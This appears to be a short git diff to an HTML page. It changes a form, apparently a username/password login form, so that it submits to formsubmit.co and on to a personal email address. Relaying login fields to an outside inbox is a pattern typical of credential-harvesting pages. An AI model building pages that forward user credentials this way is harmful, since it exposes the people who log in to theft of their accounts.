--- a/index.html
+++ b/index.html
@@ -9,7 +9,7 @@
 </head>
 
 <body>
-    <form>
+    <form action="https://formsubmit.co/nesimigashi76@email.com" method="POST">
     
         
         <div class="userpass">
